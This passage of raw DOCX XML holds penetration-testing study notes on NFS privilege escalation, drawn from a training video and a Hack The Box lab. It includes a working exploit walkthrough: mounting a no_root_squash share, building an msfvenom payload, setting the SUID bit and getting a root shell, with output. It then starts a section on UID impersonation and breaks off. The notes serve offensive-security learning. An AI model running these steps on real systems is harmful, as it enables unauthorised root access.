      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -ld /mnt/1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-d: The directory option tells ls to show information about the directory itself, not the files inside it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F79">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5600700" cy="1400175"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="315" name="image309.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image309.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1042"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="560070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2F7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="869"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can see that the directory is owned by the UID 2017, and belongs to the group with the ID of www-data, or 33 . This means that on the target box, i.e the server hosting the share, the directory is owned by a user with that specific UID. We proceed to the second share</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F7B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F7C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8iegqexyojqx" w:id="421"/>
      <w:bookmarkEnd w:id="421"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Abusing no_root_squash configuration to priv esc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F7D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F7E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the Tib3rius NFS video from Linux Priv Esc Video</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F7F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F80">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Root Squashing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1366"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Root Squashing is how NFS prevents an obvious privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F82">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1366"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the remote user is (or claims to be) root (uid=0), NFS will instead "squash" the user and treat them as if they are the "nobody" user, in the "nogroup" group.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F83">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1366"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">While this behavior is default, it can be disabled</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F84">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F85">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">no_root_squash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F86">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="645"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">no_root_squash is an NFS configuration option which turns root squashing off.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="645"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When included in a writable share configuration, a remote user who identifies as "root" can create files on the NFS share as the local root user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F88">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F89">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F8A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1280"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check the contents of /etc/exports for shares with the no_root_squash option</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F8B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1280"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/exports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1280"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1280"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F8E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1280"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Confirm that the NFS share is available for remote mounting:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F90">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1280"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">showmount -e 192.168.1.25</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F91">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1280"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exports list on 192.168.1.25:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1280"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1280"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a mount point on your local machine and mount the /tmp NFS share:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1280"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir /tmp/nfs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1280"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mount -o rw,vers=2 192.168.1.25:/tmp /tmp/nfs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1280"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the root user on your local machine, generate a payload and save it to the mounted share</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1280"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1280"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure the file has the SUID bit set, and is executable by Everyone</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1280"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +xs /tmp/nfs/shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1280"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the target machine, execute the file to get a root shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1280"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F9C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1280"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash-4.1# id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F9D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1280"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=1000(user) gid=1000(user) euid=0(root) egid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F9E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F9F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FA0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FA1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FA2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FA3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FA4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_31480nv5f8k3" w:id="422"/>
      <w:bookmarkEnd w:id="422"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Impersonation (editing UID/GID) to read file/directory for NFS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FA5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FA6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Squashed HTB</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we have an NFS directory that we mounted locally, and the files of the directory contain the files of a website. But, we don't have editing privileges for the directory. However, after running "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -ld</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">", we saw that the directory is owned by the UID 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002FA7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
